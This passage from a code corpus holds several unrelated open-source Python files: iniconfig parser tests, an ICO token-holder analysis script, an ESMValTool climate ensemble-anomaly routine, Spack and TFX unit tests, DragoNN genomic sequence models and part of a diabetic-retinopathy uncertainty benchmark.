assert config['section'].lineof('value') == 2
assert config['section2'].lineof('value') == 5
def test_iniconfig_get_convert():
config = IniConfig("x", data='[section]\nint = 1\nfloat = 1.1')
assert config.get('section', 'int') == '1'
assert config.get('section', 'int', convert=int) == 1
def test_iniconfig_get_missing():
config = IniConfig("x", data='[section]\nint = 1\nfloat = 1.1')
assert config.get('section', 'missing', default=1) == 1
assert config.get('section', 'missing') is None
def test_section_get():
config = IniConfig("x", data='[section]\nvalue=1')
section = config['section']
assert section.get('value', convert=int) == 1
assert section.get('value', 1) == "1"
assert section.get('missing', 2) == 2
def test_missing_section():
config = IniConfig("x", data='[section]\nvalue=1')
with pytest.raises(KeyError):
config["other"]
def test_section_getitem():
config = IniConfig("x", data='[section]\nvalue=1')
assert config['section']['value'] == '1'
assert config['section']['value'] == '1'
def test_section_iter():
config = IniConfig("x", data='[section]\nvalue=1')
names = list(config['section'])
assert names == ['value']
items = list(config['section'].items())
assert items == [('value', '1')]
def test_config_iter():
config = IniConfig("x.ini", data=dedent('''
[section1]
value=1
[section2]
value=2
'''))
l = list(config)
assert len(l) == 2
assert l[0].name == 'section1'
assert l[0]['value'] == '1'
assert l[1].name == 'section2'
assert l[1]['value'] == '2'
def test_config_contains():
config = IniConfig("x.ini", data=dedent('''
[section1]
value=1
[section2]
value=2
'''))
assert 'xyz' not in config
assert 'section1' in config
assert 'section2' in config
def test_iter_file_order():
config = IniConfig("x.ini", data="""
[section2] #cpython dict ordered before section
value = 1
value2 = 2 # dict ordered before value
[section]
a = 1
b = 2
""")
l = list(config)
secnames = [x.name for x in l]
assert secnames == ['section2', 'section']
assert list(config['section2']) == ['value', 'value2']
assert list(config['section']) == ['a', 'b']
def test_example_pypirc():
config = IniConfig("pypirc", data=dedent('''
[distutils]
index-servers =
pypi
other
[pypi]
repository: <repository-url>
username: <username>
password: <password>
[other]
repository: http://example.com/pypi
username: <username>
password: <password>
'''))
distutils, pypi, other = list(config)
assert distutils["index-servers"] == "pypi\nother"
assert pypi['repository'] == '<repository-url>'
assert pypi['username'] == '<username>'
assert pypi['password'] == '<password>'
assert ['repository', 'username', 'password'] == list(other)
def test_api_import():
assert ALL == ['IniConfig', 'ParseError']
@pytest.mark.parametrize("line", [
"#qwe",
" #qwe",
";qwe",
" ;qwe",
])
def test_iscommentline_true(line):
assert iscommentline(line)
|
analysis/calculate_holding_amount.py | hao44le/ico_top_holder_analysis | 538 | 8297 | import sys
sys.path.insert(0,'..')
from data.whale_data import exchnage_accounts
from data.html_helper import check_if_address_name_exists
from data.whale_eth_tx_data import *
from data.whale_token_tx_data import identify_investor_type_token
holding_account = "holding_account"
deposit_account = 'deposit_account'
withdraw_account = "withdraw_account"
in_type = "IN"
out_type = "OUT"
all_acc_types = dict()
for acc in exchnage_accounts:
all_acc_types[acc] = exchange_type
def update_y_array(X,y,timestamp,amount):
target_index = 0
for i in range(len(X)):
x_time = X[i]
if timestamp < x_time:
target_index = i
break
for i in range(target_index,len(y)):
y[i] += amount
return y
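# Example: with X = [10, 20, 30], timestamp = 15 and amount = 5, target_index
# becomes 1, so y[1] and y[2] are each increased by 5 (the amount is credited
# to every sample point at or after the transaction time).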
def perform_bfs_on_accounts(out_txs,top_holder_type,acc,m_type='OUT'):
print("\t"+m_type)
unique_out = set()
for out in out_txs:
unique_out.add(out[3])
unique_out = list(unique_out)[:5]
for out in unique_out:
print("\t"+out)
if out not in all_acc_types:
investor_type = identify_investor_type(out)
if investor_type == affliate_type:
investor_type = identify_investor_type_token(out)
print("\t\t{}".format(investor_type))
else:
investor_type = all_acc_types[out]
if investor_type == exchange_type:
top_holder_type[acc] = deposit_account if m_type == "OUT" else withdraw_account
all_acc_types[out] = investor_type
if acc not in top_holder_type:
top_holder_type[acc] = holding_account
return top_holder_type
def calculate_holding_amount(X,escape_accounts,txs):
top_holder_type = dict()
for acc in txs:
tx = txs[acc]
if acc in escape_accounts:
continue
# If the current account has never transferred tokens out, ignore it
out_txs = [item for item in tx if item[2] == 'OUT']
if len(out_txs) == 0:
print("\tholding account")
top_holder_type[acc] = holding_account
continue
# build all traxe Y: holding_amount, deposit_amount, withdraw_amount
amount_trace_y = [0] * len(X)
for holder in txs:
if holder in escape_accounts:
continue
if holder not in top_holder_type:
print("{} not identified! ".format(holder))
continue
holder_type = top_holder_type[holder]
holder_txs = txs[holder]
print("{} {}".format(holder,holder_type))
for tx in holder_txs:
[timestamp,from_a,tx_type,to_a,amount] = tx
if holder_type == holding_account:
if tx_type == in_type:
amount_trace_y = update_y_array(X,amount_trace_y,timestamp,amount)
else:
amount_trace_y = update_y_array(X,amount_trace_y,timestamp,-amount)
return amount_trace_y
|
esmvaltool/diag_scripts/ensclus/ens_anom.py | yifatdzigan/ESMValTool | 148 | 8321 | """Computation of ensemble anomalies based on a desired value."""
import os
import numpy as np
from scipy import stats
# User-defined packages
from read_netcdf import read_iris, save_n_2d_fields
from sel_season_area import sel_area, sel_season
def ens_anom(filenames, dir_output, name_outputs, varname, numens, season,
area, extreme):
"""Ensemble anomalies.
Computation of the ensemble anomalies based on the desired value
from the input variable (it can be the percentile, mean, maximum, standard
deviation or trend)
OUTPUT: NetCDF files of ensemble mean of climatology, selected value and
anomaly maps.
"""
print('The name of the output files will be <variable>_{0}.txt'
.format(name_outputs))
print('Number of ensemble members: {0}'.format(numens))
outfiles = []
# Reading the netCDF file of 3Dfield, for all the ensemble members
var_ens = []
for ens in range(numens):
ifile = filenames[ens]
# print('ENSEMBLE MEMBER %s' %ens)
var, varunits, lat, lon, dates, _ = read_iris(ifile)
# Conversion from kg m-2 s-1 to mm/day
if varunits == 'kg m-2 s-1':
var = var * 86400 # there are 86400 seconds in a day
varunits = 'mm/day'
# Selecting a season (DJF,DJFM,NDJFM,JJA)
var_season, _ = sel_season(var, dates, season)
# Selecting only [latS-latN, lonW-lonE] box region
var_area, lat_area, lon_area = sel_area(lat, lon, var_season, area)
var_ens.append(var_area)
if varunits == 'kg m-2 s-1':
print('\nPrecipitation rate units were converted from kg m-2 s-1 '
'to mm/day')
print('The variable is {0} ({1})'.format(varname, varunits))
print('Original var shape: (time x lat x lon)={0}'.format(var.shape))
print('var shape after selecting season {0} and area {1}: '
'(time x lat x lon)={2}'.format(season, area, var_area.shape))
if extreme == 'mean':
# Compute the time mean over the entire period, for each ens member
varextreme_ens = [np.nanmean(var_ens[i], axis=0)
for i in range(numens)]
elif len(extreme.split("_")) == 2:
# Compute the chosen percentile over the period, for each ens member
quant = int(extreme.partition("th")[0])
varextreme_ens = [np.nanpercentile(var_ens[i], quant, axis=0)
for i in range(numens)]
elif extreme == 'maximum':
# Compute the maximum value over the period, for each ensemble member
varextreme_ens = [np.nanmax(var_ens[i], axis=0) for i in range(numens)]
elif extreme == 'std':
# Compute the standard deviation over the period, for each ens member
varextreme_ens = [np.nanstd(var_ens[i], axis=0) for i in range(numens)]
elif extreme == 'trend':
# Compute the linear trend over the period, for each ensemble member
trendmap = np.empty((var_ens[0].shape[1], var_ens[0].shape[2]))
trendmap_ens = []
for i in range(numens):
for jla in range(var_ens[0].shape[1]):
for jlo in range(var_ens[0].shape[2]):
slope, _, _, _, _ = \
stats.linregress(range(var_ens[0].shape[0]),
var_ens[i][:, jla, jlo])
trendmap[jla, jlo] = slope
trendmap_ens.append(trendmap.copy())
varextreme_ens = trendmap_ens
varextreme_ens_np = np.array(varextreme_ens)
print('Anomalies are computed with respect to the {0}'.format(extreme))
# Compute and save the anomalies with respect to the ensemble
ens_anomalies = varextreme_ens_np - np.nanmean(varextreme_ens_np, axis=0)
varsave = 'ens_anomalies'
ofile = os.path.join(dir_output, 'ens_anomalies_{0}.nc'
.format(name_outputs))
# print(ofile)
print('ens_anomalies shape: (numens x lat x lon)={0}'
.format(ens_anomalies.shape))
save_n_2d_fields(lat_area, lon_area, ens_anomalies, varsave,
varunits, ofile)
outfiles.append(ofile)
# Compute and save the climatology
vartimemean_ens = [np.mean(var_ens[i], axis=0) for i in range(numens)]
ens_climatologies = np.array(vartimemean_ens)
varsave = 'ens_climatologies'
ofile = os.path.join(dir_output, 'ens_climatologies_{0}.nc'
.format(name_outputs))
save_n_2d_fields(lat_area, lon_area, ens_climatologies, varsave,
varunits, ofile)
outfiles.append(ofile)
ens_extreme = varextreme_ens_np
varsave = 'ens_extreme'
ofile = os.path.join(dir_output, 'ens_extreme_{0}.nc'.format(name_outputs))
save_n_2d_fields(lat_area, lon_area, ens_extreme, varsave,
varunits, ofile)
outfiles.append(ofile)
return outfiles
|
lib/spack/spack/test/cache_fetch.py | LiamBindle/spack | 2,360 | 8325 | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
import pytest
from llnl.util.filesystem import mkdirp, touch
import spack.config
from spack.fetch_strategy import CacheURLFetchStrategy, NoCacheError
from spack.stage import Stage
@pytest.mark.parametrize('_fetch_method', ['curl', 'urllib'])
def test_fetch_missing_cache(tmpdir, _fetch_method):
"""Ensure raise a missing cache file."""
testpath = str(tmpdir)
with spack.config.override('config:url_fetch_method', _fetch_method):
fetcher = CacheURLFetchStrategy(url='file:///not-a-real-cache-file')
with Stage(fetcher, path=testpath):
with pytest.raises(NoCacheError, match=r'No cache'):
fetcher.fetch()
@pytest.mark.parametrize('_fetch_method', ['curl', 'urllib'])
def test_fetch(tmpdir, _fetch_method):
"""Ensure a fetch after expanding is effectively a no-op."""
testpath = str(tmpdir)
cache = os.path.join(testpath, 'cache.tar.gz')
touch(cache)
url = 'file:///{0}'.format(cache)
with spack.config.override('config:url_fetch_method', _fetch_method):
fetcher = CacheURLFetchStrategy(url=url)
with Stage(fetcher, path=testpath) as stage:
source_path = stage.source_path
mkdirp(source_path)
fetcher.fetch()
|
tfx/orchestration/experimental/core/service_jobs_test.py | BACtaki/tfx | 1,813 | 8349 | # Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.orchestration.experimental.core.service_jobs."""
from absl.testing.absltest import mock
import tensorflow as tf
from tfx.orchestration.experimental.core import service_jobs
from tfx.orchestration.experimental.core import test_utils
class ExceptionHandlingServiceJobManagerWrapperTest(test_utils.TfxTest):
def setUp(self):
super().setUp()
self._mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
self._mock_service_job_manager.ensure_node_services.return_value = (
service_jobs.ServiceStatus.SUCCESS)
self._mock_service_job_manager.stop_node_services.return_value = True
self._mock_service_job_manager.is_pure_service_node.return_value = True
self._mock_service_job_manager.is_mixed_service_node.return_value = False
self._wrapper = service_jobs.ExceptionHandlingServiceJobManagerWrapper(
self._mock_service_job_manager)
def test_calls_forwarded_to_underlying_instance(self):
self.assertEqual(service_jobs.ServiceStatus.SUCCESS,
self._wrapper.ensure_node_services(mock.Mock(), 'node1'))
self.assertTrue(self._wrapper.stop_node_services(mock.Mock(), 'node2'))
self.assertTrue(self._wrapper.is_pure_service_node(mock.Mock(), 'node3'))
self.assertFalse(self._wrapper.is_mixed_service_node(mock.Mock(), 'node4'))
self._mock_service_job_manager.ensure_node_services.assert_called_once_with(
mock.ANY, 'node1')
self._mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'node2')
self._mock_service_job_manager.is_pure_service_node.assert_called_once_with(
mock.ANY, 'node3')
self._mock_service_job_manager.is_mixed_service_node.assert_called_once_with(
mock.ANY, 'node4')
def test_ensure_node_services_exception_handling(self):
self._mock_service_job_manager.ensure_node_services.side_effect = RuntimeError(
'test error')
self.assertEqual(service_jobs.ServiceStatus.FAILED,
self._wrapper.ensure_node_services(mock.Mock(), 'node1'))
self._mock_service_job_manager.ensure_node_services.assert_called_once_with(
mock.ANY, 'node1')
def test_stop_node_services_exception_handling(self):
self._mock_service_job_manager.stop_node_services.side_effect = RuntimeError(
'test error')
self.assertFalse(self._wrapper.stop_node_services(mock.Mock(), 'node2'))
self._mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'node2')
if __name__ == '__main__':
tf.test.main()
|
dragonn/models.py | kundajelab/dragonn | 251 | 8350 |
from __future__ import absolute_import, division, print_function
import matplotlib
import numpy as np
import os
import subprocess
import sys
import tempfile
matplotlib.use('pdf')
import matplotlib.pyplot as plt
from abc import abstractmethod, ABCMeta
from dragonn.metrics import ClassificationResult
from sklearn.svm import SVC as scikit_SVC
from sklearn.tree import DecisionTreeClassifier as scikit_DecisionTree
from sklearn.ensemble import RandomForestClassifier
from keras.models import load_model
from dragonn.runtime_metrics import *
from dragonn.custom_losses import *
import warnings
warnings.filterwarnings('ignore')
def load_dragonn_model(model_string):
custom_objects={"recall":recall,
"sensitivity":recall,
"specificity":specificity,
"fpr":fpr,
"fnr":fnr,
"fdr":fdr,
"precision":precision,
"f1":f1,
"spearman_corr":spearman_corr,
"ambig_binary_crossentropy":ambig_binary_crossentropy,
"ambig_mean_squared_error":ambig_mean_squared_error}
model=load_model(model_string,custom_objects=custom_objects)
return model
class Model(object):
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, **hyperparameters):
pass
@abstractmethod
def train(self, X, y, validation_data):
pass
@abstractmethod
def predict(self, X):
pass
def test(self, X, y):
return ClassificationResult(y, self.predict(X))
def score(self, X, y, metric):
return self.test(X, y)[metric]
class SequenceDNN(Model):
"""
Sequence DNN models.
Parameters
----------
seq_length : int, optional
length of input sequence.
keras_model : instance of keras.models.Sequential, optional
seq_length or keras_model must be specified.
num_tasks : int, optional
number of tasks. Default: 1.
num_filters : list[int] | tuple[int]
number of convolutional filters in each layer. Default: (15,).
conv_width : list[int] | tuple[int]
width of each layer's convolutional filters. Default: (15,).
pool_width : int
width of max pooling after the last layer. Default: 35.
L1 : float
strength of L1 penalty.
dropout : float
dropout probability in every convolutional layer. Default: 0.
verbose: int
Verbosity level during training. Valid values: 0, 1, 2.
Returns
-------
Compiled DNN model.
"""
def __init__(self, seq_length=None, keras_model=None,
use_RNN=False, num_tasks=1,
num_filters=(15, 15, 15), conv_width=(15, 15, 15),
pool_width=35, GRU_size=35, TDD_size=15,
L1=0, dropout=0.0, num_epochs=100, verbose=1):
from keras.models import Sequential
from keras.layers.core import (
Activation, Dense, Dropout, Flatten,
Permute, Reshape, TimeDistributedDense
)
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.layers.recurrent import GRU
from keras.regularizers import l1
self.num_tasks = num_tasks
self.num_epochs = num_epochs
self.verbose = verbose
self.train_metrics = []
self.valid_metrics = []
if keras_model is not None and seq_length is None:
self.model = keras_model
self.num_tasks = keras_model.layers[-1].output_shape[-1]
elif seq_length is not None and keras_model is None:
self.model = Sequential()
assert len(num_filters) == len(conv_width)
for i, (nb_filter, nb_col) in enumerate(zip(num_filters, conv_width)):
conv_height = 4 if i == 0 else 1
self.model.add(Convolution2D(
nb_filter=nb_filter, nb_row=conv_height,
nb_col=nb_col, activation='linear',
init='he_normal', input_shape=(1, 4, seq_length),
W_regularizer=l1(L1), b_regularizer=l1(L1)))
self.model.add(Activation('relu'))
self.model.add(Dropout(dropout))
self.model.add(MaxPooling2D(pool_size=(1, pool_width)))
if use_RNN:
num_max_pool_outputs = self.model.layers[-1].output_shape[-1]
self.model.add(Reshape((num_filters[-1], num_max_pool_outputs)))
self.model.add(Permute((2, 1)))
self.model.add(GRU(GRU_size, return_sequences=True))
self.model.add(TimeDistributedDense(TDD_size, activation='relu'))
self.model.add(Flatten())
self.model.add(Dense(output_dim=self.num_tasks))
self.model.add(Activation('sigmoid'))
self.model.compile(optimizer='adam', loss='binary_crossentropy')
else:
raise ValueError("Exactly one of seq_length or keras_model must be specified!")
def train(self, X, y, validation_data, early_stopping_metric='Loss',
early_stopping_patience=5, save_best_model_to_prefix=None):
if y.dtype != bool:
assert set(np.unique(y)) == {0, 1}
y = y.astype(bool)
multitask = y.shape[1] > 1
if not multitask:
num_positives = y.sum()
num_sequences = len(y)
num_negatives = num_sequences - num_positives
if self.verbose >= 1:
print('Training model (* indicates new best result)...')
X_valid, y_valid = validation_data
early_stopping_wait = 0
best_metric = np.inf if early_stopping_metric == 'Loss' else -np.inf
for epoch in range(1, self.num_epochs + 1):
self.model.fit(X, y, batch_size=128, nb_epoch=1,
class_weight={True: num_sequences / num_positives,
False: num_sequences / num_negatives}
if not multitask else None, verbose=self.verbose >= 2)
epoch_train_metrics = self.test(X, y)
epoch_valid_metrics = self.test(X_valid, y_valid)
self.train_metrics.append(epoch_train_metrics)
self.valid_metrics.append(epoch_valid_metrics)
if self.verbose >= 1:
print('Epoch {}:'.format(epoch))
print('Train {}'.format(epoch_train_metrics))
print('Valid {}'.format(epoch_valid_metrics), end='')
current_metric = epoch_valid_metrics[early_stopping_metric].mean()
if (early_stopping_metric == 'Loss') == (current_metric <= best_metric):
if self.verbose >= 1:
print(' *')
best_metric = current_metric
best_epoch = epoch
early_stopping_wait = 0
if save_best_model_to_prefix is not None:
self.save(save_best_model_to_prefix)
else:
if self.verbose >= 1:
print()
if early_stopping_wait >= early_stopping_patience:
break
early_stopping_wait += 1
if self.verbose >= 1:
print('Finished training after {} epochs.'.format(epoch))
if save_best_model_to_prefix is not None:
print("The best model's architecture and weights (from epoch {0}) "
'were saved to {1}.arch.json and {1}.weights.h5'.format(
best_epoch, save_best_model_to_prefix))
def predict(self, X):
return self.model.predict(X, batch_size=128, verbose=False)
def get_sequence_filters(self):
"""
Returns 3D array of 2D sequence filters.
"""
return self.model.layers[0].get_weights()[0].squeeze(axis=1)
@staticmethod
def _plot_scores(X, output_directory, peak_width, score_func, score_name):
from dragonn.plot import plot_bases_on_ax
scores = score_func(X).squeeze(axis=2) # (num_task, num_samples, num_bases, sequence_length)
try:
os.makedirs(output_directory)
except OSError:
pass
num_tasks = len(scores)
for task_index, task_scores in enumerate(scores):
for sequence_index, sequence_scores in enumerate(task_scores):
# sequence_scores is num_bases x sequence_length
basewise_max_sequence_scores = sequence_scores.max(axis=0)
plt.clf()
figure, (top_axis, bottom_axis) = plt.subplots(2)
top_axis.plot(range(1, len(basewise_max_sequence_scores) + 1),
basewise_max_sequence_scores)
top_axis.set_title('{} scores (motif highlighted)'.format(score_name))
peak_position = basewise_max_sequence_scores.argmax()
top_axis.axvspan(peak_position - peak_width, peak_position + peak_width,
color='grey', alpha=0.1)
peak_sequence_scores = sequence_scores[:, peak_position - peak_width :
peak_position + peak_width].T
# Set non-max letter_heights to zero
letter_heights = np.zeros_like(peak_sequence_scores)
letter_heights[np.arange(len(letter_heights)),
peak_sequence_scores.argmax(axis=1)] = \
basewise_max_sequence_scores[peak_position - peak_width :
peak_position + peak_width]
plot_bases_on_ax(letter_heights, bottom_axis)
bottom_axis.set_xticklabels(tuple(map(
str, np.arange(peak_position - peak_width, peak_position + peak_width + 1))))
bottom_axis.tick_params(axis='x', labelsize='small')
plt.xlabel('Position')
plt.ylabel('Score')
plt.savefig(os.path.join(output_directory, 'sequence_{}{}'.format(
sequence_index, '_task_{}'.format(task_index) if num_tasks > 1 else '')))
plt.close()
def plot_deeplift(self, X, output_directory, peak_width=10):
self._plot_scores(X, output_directory, peak_width,
score_func=self.deeplift, score_name='DeepLift')
def plot_in_silico_mutagenesis(self, X, output_directory, peak_width=10):
self._plot_scores(X, output_directory, peak_width,
score_func=self.in_silico_mutagenesis, score_name='ISM')
def plot_architecture(self, output_file):
from dragonn.visualize_util import plot as plot_keras_model
plot_keras_model(self.model, output_file, show_shape=True)
def save(self, save_best_model_to_prefix):
arch_fname = save_best_model_to_prefix + '.arch.json'
weights_fname = save_best_model_to_prefix + '.weights.h5'
open(arch_fname, 'w').write(self.model.to_json())
self.model.save_weights(weights_fname, overwrite=True)
@staticmethod
def load(model_hdf5_fname=None, arch_fname=None, weights_fname=None):
if model_hdf5_fname!=None:
from keras.models import load_model
sequence_dnn=SequenceDNN(keras_model=load_model(model_hdf5_fname))
else:
from keras.models import model_from_json
model_json_string = open(arch_fname).read()
sequence_dnn = SequenceDNN(keras_model=model_from_json(model_json_string))
if weights_fname is not None:
sequence_dnn.model.load_weights(weights_fname)
return sequence_dnn
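# Minimal usage sketch (assumptions: X arrays are one-hot encoded DNA of shape
# (num_sequences, 1, 4, seq_length) and y is a binary label matrix; the shapes
# and variable names are hypothetical):
#   dnn = SequenceDNN(seq_length=500, num_filters=(15,), conv_width=(15,), num_epochs=10)
#   dnn.train(X_train, y_train, validation_data=(X_valid, y_valid))
#   predictions = dnn.predict(X_test)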
class MotifScoreRNN(Model):
def __init__(self, input_shape, gru_size=10, tdd_size=4):
from keras.models import Sequential
from keras.layers.core import (
Activation, Dense, Flatten, TimeDistributedDense
)
from keras.layers.recurrent import GRU
self.model = Sequential()
self.model.add(GRU(gru_size, return_sequences=True,
input_shape=input_shape))
if tdd_size is not None:
self.model.add(TimeDistributedDense(tdd_size))
self.model.add(Flatten())
self.model.add(Dense(1))
self.model.add(Activation('sigmoid'))
print('Compiling model...')
self.model.compile(optimizer='adam', loss='binary_crossentropy')
def train(self, X, y, validation_data):
from keras.callbacks import EarlyStopping
print('Training model...')
multitask = y.shape[1] > 1
if not multitask:
num_positives = y.sum()
num_sequences = len(y)
num_negatives = num_sequences - num_positives
self.model.fit(
X, y, batch_size=128, nb_epoch=100,
validation_data=validation_data,
class_weight={True: num_sequences / num_positives,
False: num_sequences / num_negatives}
if not multitask else None,
callbacks=[EarlyStopping(monitor='val_loss', patience=10)],
verbose=True)
def predict(self, X):
return self.model.predict(X, batch_size=128, verbose=False)
class gkmSVM(Model):
def __init__(self, prefix='./gkmSVM', word_length=11, mismatches=3, C=1,
threads=1, cache_memory=100, verbosity=4):
self.word_length = word_length
self.mismatches = mismatches
self.C = C
self.threads = threads
self.prefix = '_'.join(map(str, (prefix, word_length, mismatches, C)))
options_list = zip(
['-l', '-d', '-c', '-T', '-m', '-v'],
map(str, (word_length, mismatches, C, threads, cache_memory, verbosity)))
self.options = ' '.join([' '.join(option) for option in options_list])
@property
def model_file(self):
model_fname = '{}.model.txt'.format(self.prefix)
return model_fname if os.path.isfile(model_fname) else None
@staticmethod
def encode_sequence_into_fasta_file(sequence_iterator, ofname):
"""writes sequences into fasta file
"""
with open(ofname, "w") as wf:
for i, seq in enumerate(sequence_iterator):
print('>{}'.format(i), file=wf)
print(seq, file=wf)
def train(self, X, y, validation_data=None):
"""
Trains gkm-svm, saves model file.
"""
y = y.squeeze()
pos_sequence = X[y]
neg_sequence = X[~y]
pos_fname = "%s.pos_seq.fa" % self.prefix
neg_fname = "%s.neg_seq.fa" % self.prefix
# create temporary fasta files
self.encode_sequence_into_fasta_file(pos_sequence, pos_fname)
self.encode_sequence_into_fasta_file(neg_sequence, neg_fname)
# run command
command = ' '.join(
('gkmtrain', self.options, pos_fname, neg_fname, self.prefix))
process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
process.wait() # wait for it to finish
# remove fasta files
os.system("rm %s" % pos_fname)
os.system("rm %s" % neg_fname)
def predict(self, X):
if self.model_file is None:
raise RuntimeError("GkmSvm hasn't been trained!")
# write test fasta file
test_fname = "%s.test.fa" % self.prefix
self.encode_sequence_into_fasta_file(X, test_fname)
# test gkmsvm
temp_ofp = tempfile.NamedTemporaryFile()
threads_option = '-T %s' % (str(self.threads))
command = ' '.join(['gkmpredict',
test_fname,
self.model_file,
temp_ofp.name,
threads_option])
process = subprocess.Popen(command, shell=True)
process.wait() # wait for it to finish
os.system("rm %s" % test_fname) # remove fasta file
# get classification results
temp_ofp.seek(0)
y = np.array([line.split()[-1] for line in temp_ofp], dtype=float)
temp_ofp.close()
return np.expand_dims(y, 1)
class SVC(Model):
def __init__(self):
self.classifier = scikit_SVC(probability=True, kernel='linear')
def train(self, X, y, validation_data=None):
self.classifier.fit(X, y)
def predict(self, X):
return self.classifier.predict_proba(X)[:, 1:]
class DecisionTree(Model):
def __init__(self):
self.classifier = scikit_DecisionTree()
def train(self, X, y, validation_data=None):
self.classifier.fit(X, y)
def predict(self, X):
predictions = np.asarray(self.classifier.predict_proba(X))[..., 1]
if len(predictions.shape) == 2: # multitask
predictions = predictions.T
else: # single-task
predictions = np.expand_dims(predictions, 1)
return predictions
class RandomForest(DecisionTree):
def __init__(self):
self.classifier = RandomForestClassifier(n_estimators=100)
|
bdlb/diabetic_retinopathy_diagnosis/benchmark.py | Sairam954/bdl-benchmarks | 666 | 8364 | # Copyright 2019 BDL Benchmarks Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Diabetic retinopathy diagnosis BDL Benchmark."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
from typing import Callable
from typing import Dict
from typing import Optional
from typing import Sequence
from typing import Text
from typing import Tuple
from typing import Union
import numpy as np
import pandas as pd
import tensorflow as tf
from absl import logging
from ..core import transforms
from ..core.benchmark import Benchmark
from ..core.benchmark import BenchmarkInfo
from ..core.benchmark import DataSplits
from ..core.constants import DATA_DIR
from ..core.levels import Level
tfk = tf.keras
_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR = os.path.join(
DATA_DIR, "downloads", "manual", "diabetic_retinopathy_diagnosis")
class DiabeticRetinopathyDiagnosisBecnhmark(Benchmark):
"""Diabetic retinopathy diagnosis benchmark class."""
def __init__(
self,
level: Union[Text, Level],
batch_size: int = 64,
data_dir: Optional[Text] = None,
download_and_prepare: bool = False,
):
"""Constructs a benchmark object.
Args:
      level: `Level` or `str`, downstream task level.
batch_size: (optional) `int`, number of datapoints
per mini-batch.
data_dir: (optional) `str`, path to parent data directory.
download_and_prepare: (optional) `bool`, if the data is not available
it downloads and preprocesses it.
"""
self.__level = level if isinstance(level, Level) else Level.from_str(level)
try:
self.__ds = self.load(level=level,
batch_size=batch_size,
data_dir=data_dir or DATA_DIR)
except AssertionError:
if not download_and_prepare:
raise
else:
logging.info(
"Data not found, `DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()`"
" is now running...")
self.download_and_prepare()
@classmethod
def evaluate(
cls,
estimator: Callable[[np.ndarray], Tuple[np.ndarray, np.ndarray]],
dataset: tf.data.Dataset,
output_dir: Optional[Text] = None,
name: Optional[Text] = None,
) -> Dict[Text, float]:
"""Evaluates an `estimator` on the `mode` benchmark dataset.
Args:
estimator: `lambda x: mu_x, uncertainty_x`, an uncertainty estimation
function, which returns `mean_x` and predictive `uncertainty_x`.
dataset: `tf.data.Dataset`, on which dataset to performance evaluation.
output_dir: (optional) `str`, directory to save figures.
name: (optional) `str`, the name of the method.
"""
import inspect
import tqdm
import tensorflow_datasets as tfds
from sklearn.metrics import roc_auc_score
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
# Containers used for caching performance evaluation
y_true = list()
y_pred = list()
y_uncertainty = list()
# Convert to NumPy iterator if necessary
ds = dataset if inspect.isgenerator(dataset) else tfds.as_numpy(dataset)
for x, y in tqdm.tqdm(ds):
# Sample from probabilistic model
mean, uncertainty = estimator(x)
# Cache predictions
y_true.append(y)
y_pred.append(mean)
y_uncertainty.append(uncertainty)
# Use vectorized NumPy containers
y_true = np.concatenate(y_true).flatten()
y_pred = np.concatenate(y_pred).flatten()
y_uncertainty = np.concatenate(y_uncertainty).flatten()
fractions = np.asarray([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
# Metrics for evaluation
metrics = zip(["accuracy", "auc"], cls.metrics())
return {
metric: cls._evaluate_metric(
y_true,
y_pred,
y_uncertainty,
fractions,
lambda y_true, y_pred: metric_fn(y_true, y_pred).numpy(),
name,
) for (metric, metric_fn) in metrics
}
@staticmethod
def _evaluate_metric(
y_true: np.ndarray,
y_pred: np.ndarray,
y_uncertainty: np.ndarray,
fractions: Sequence[float],
metric_fn: Callable[[np.ndarray, np.ndarray], float],
name=None,
) -> pd.DataFrame:
"""Evaluate model predictive distribution on `metric_fn` at data retain
`fractions`.
Args:
y_true: `numpy.ndarray`, the ground truth labels, with shape [N].
y_pred: `numpy.ndarray`, the model predictions, with shape [N].
y_uncertainty: `numpy.ndarray`, the model uncertainties,
with shape [N].
fractions: `iterable`, the percentages of data to retain for
calculating `metric_fn`.
metric_fn: `lambda(y_true, y_pred) -> float`, a metric
function that provides a score given ground truths
and predictions.
name: (optional) `str`, the name of the method.
Returns:
A `pandas.DataFrame` with columns ["retained_data", "mean", "std"],
that summarizes the scores at different data retained fractions.
"""
N = y_true.shape[0]
# Sorts indexes by ascending uncertainty
I_uncertainties = np.argsort(y_uncertainty)
# Score containers
mean = np.empty_like(fractions)
# TODO(filangel): do bootstrap sampling and estimate standard error
std = np.zeros_like(fractions)
for i, frac in enumerate(fractions):
# Keep only the %-frac of lowest uncertainties
I = np.zeros(N, dtype=bool)
I[I_uncertainties[:int(N * frac)]] = True
mean[i] = metric_fn(y_true[I], y_pred[I])
# Store
df = pd.DataFrame(dict(retained_data=fractions, mean=mean, std=std))
df.name = name
return df
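  # Worked example with illustrative numbers: for N=4 predictions with uncertainties
  # [0.9, 0.1, 0.5, 0.3] and fractions=[0.5, 1.0], the 0.5 row keeps only the two
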